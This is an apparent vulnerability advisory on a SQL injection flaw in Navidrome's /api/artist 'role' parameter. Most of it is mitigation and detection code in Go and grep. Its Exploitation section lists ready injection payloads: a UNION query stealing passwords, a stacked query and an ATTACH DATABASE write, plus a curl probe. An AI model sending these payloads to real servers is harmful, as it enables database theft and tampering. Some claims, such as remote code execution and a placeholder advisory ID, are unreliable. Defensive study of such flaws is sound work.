How the CVE Works
The vulnerability in Navidrome v0.55.0 to v0.55.2 stems from insufficient input sanitization in the `role` parameter of the `/api/artist` endpoint. Attackers can inject malicious SQL queries, exploiting the SQLite backend. By crafting a specially formatted HTTP request, an attacker can execute stacked or UNION-based queries, extracting or modifying database contents. The lack of prepared statements allows direct query concatenation, leading to remote code execution or data exfiltration.
DailyCVE Form
Platform: Navidrome
Version: 0.55.0 – 0.55.2
Vulnerability: SQL Injection
Severity: Critical
Date: May 29, 2025
Prediction: Patch expected by June 5, 2025
What Undercode Says:
Exploitation:
1. Craft malicious `role` parameter:
GET /api/artist?role='; SELECT FROM users;--
2. Union-based data theft:
' UNION SELECT 1,2,3,password FROM users--
3. Stacked query RCE (SQLite):
'; ATTACH DATABASE '/tmp/exploit' AS pwn; CREATE TABLE pwn.exploit(data TEXT);--
Mitigation:
1. Patch immediately: Upgrade to v0.56.0.
2. Input validation:
import "strings"

// Doubles single quotes in the value; a fallback only, not a replacement for parameterized queries.
func sanitizeInput(input string) string { return strings.ReplaceAll(input, "'", "''") }
3. Use prepared statements:
rows, err := db.Query("SELECT * FROM artists WHERE role = ?", role) // the raw value is bound by the driver, never spliced into the SQL text
4. WAF rules: Block suspicious patterns (`UNION`, `;--`).
5. Logging: Monitor for abnormal queries:
grep -Ei "UNION|--" /var/log/navidrome/access.log
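Mitigation steps 2 and 3 side by side, as an added Go example that is not Navidrome's own code: the concatenation pattern the advisory describes next to an allow-list check and a parameterized statement. The role values in `allowedRoles` and the helper names are assumptions; the advisory does not list Navidrome's real role set, and no database driver is needed because the point is what reaches the SQL text.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
)

// allowedRoles is an assumed allow-list for the role parameter; the advisory
// does not list Navidrome's real role values, so these are placeholders.
var allowedRoles = map[string]bool{
	"artist":      true,
	"albumartist": true,
	"composer":    true,
}

// ErrInvalidRole is returned for any role value not on the allow-list.
var ErrInvalidRole = errors.New("role parameter not in allow-list")

// vulnerableQuery reproduces the pattern the advisory describes: the request
// value is concatenated into the SQL text, so a quote in it ends the literal
// and whatever follows becomes part of the statement.
func vulnerableQuery(role string) string {
	return fmt.Sprintf("SELECT * FROM artists WHERE role = '%s'", role)
}

// safeQuery rejects unexpected values up front and returns a parameterized
// statement plus its argument list, ready for db.Query(sql, args...).
// The value is bound by the driver and never becomes part of the SQL text.
func safeQuery(role string) (string, []interface{}, error) {
	if !allowedRoles[role] {
		return "", nil, ErrInvalidRole
	}
	return "SELECT * FROM artists WHERE role = ?", []interface{}{role}, nil
}

// roleFromRequestURL pulls the role parameter from a request target the way a
// handler would, percent-decoding it in the process.
func roleFromRequestURL(target string) (string, error) {
	u, err := url.Parse(target)
	if err != nil {
		return "", err
	}
	return u.Query().Get("role"), nil
}

func main() {
	// Constructed request carrying the advisory's first payload, percent-encoded.
	role, err := roleFromRequestURL("/api/artist?role=%27%3B%20SELECT%20*%20FROM%20users%3B--")
	if err != nil {
		panic(err)
	}
	fmt.Println("concatenated:", vulnerableQuery(role))
	if _, _, err := safeQuery(role); err != nil {
		fmt.Println("allow-list:", err)
	}
	sql, args, _ := safeQuery("artist")
	fmt.Println("parameterized:", sql, args)
}
```

Note that `safeQuery` receives the raw decoded value: with a placeholder the driver does the quoting, so passing a pre-escaped string would bind the literal doubled quotes and break lookups.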
Detection:
curl -s "http://target/api/artist?role=test'" | grep -Ei "error|syntax"
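Mitigation step 5 and the Detection section both come down to spotting these requests in the access log, so here is an added Go scanner (not Navidrome's code) that does what the grep does but decodes the query string first, matches case-insensitively, and also flags a lone quote paired with a 5xx status, which is the footprint of the probe above. The log lines are constructed in combined-log layout; the advisory does not show Navidrome's real log format, so that layout and the `requestRe` pattern are assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strconv"
	"strings"
)

// sampleLog holds constructed access-log lines in combined-log layout; the
// advisory does not show Navidrome's real log format, so this is an assumption.
const sampleLog = `10.0.0.5 - - [29/May/2025:10:00:01 +0000] "GET /api/artist?role=artist HTTP/1.1" 200 512
10.0.0.9 - - [29/May/2025:10:00:02 +0000] "GET /api/artist?role=%27%20UNION%20SELECT%201,2,3,password%20FROM%20users-- HTTP/1.1" 500 87
10.0.0.9 - - [29/May/2025:10:00:03 +0000] "GET /api/artist?role=test%27 HTTP/1.1" 500 60
10.0.0.7 - - [29/May/2025:10:00:04 +0000] "GET /api/album?id=42 HTTP/1.1" 200 2048`

// requestRe captures the request target and the response status code.
var requestRe = regexp.MustCompile(`"(?:GET|POST|PUT|DELETE) (\S+) HTTP/[\d.]+" (\d{3})`)

// injectionRe matches the SQL fragments the advisory's payloads rely on;
// it runs on the decoded query string, case-insensitively.
var injectionRe = regexp.MustCompile(`(?i)(union\s+select|attach\s+database|;\s*(select|insert|update|delete|create|drop)|--)`)

// parseLine returns the decoded query string and status code of a log line.
func parseLine(line string) (query string, status int, ok bool) {
	m := requestRe.FindStringSubmatch(line)
	if m == nil {
		return "", 0, false
	}
	u, err := url.Parse(m[1])
	if err != nil {
		return "", 0, false
	}
	q, err := url.QueryUnescape(u.RawQuery)
	if err != nil {
		return "", 0, false
	}
	status, _ = strconv.Atoi(m[2])
	return q, status, true
}

// isSuspicious flags a line if the decoded query carries an injection fragment,
// or if a lone quote coincides with a server error (a quote-only probe that
// produced a syntax error).
func isSuspicious(line string) bool {
	q, status, ok := parseLine(line)
	if !ok {
		return false
	}
	if injectionRe.MatchString(q) {
		return true
	}
	return strings.Contains(q, "'") && status >= 500
}

// suspiciousLines returns every flagged line from a log blob.
func suspiciousLines(log string) []string {
	var out []string
	for _, l := range strings.Split(log, "\n") {
		if isSuspicious(l) {
			out = append(out, l)
		}
	}
	return out
}

func main() {
	for _, l := range suspiciousLines(sampleLog) {
		fmt.Println("suspicious:", l)
	}
}
```

Decoding before matching is the part a plain grep misses: `%27` never matches `'`, and a mixed-case `uNiOn` slips past a case-sensitive pattern. The quote-plus-5xx rule stays separate from the keyword rule so that apostrophes in ordinary search terms on successful responses are not flagged.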
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- SQLite Injection Cheatsheet: OWASP
Sources:
Reported By: github.com
Extra Source Hub:
Undercode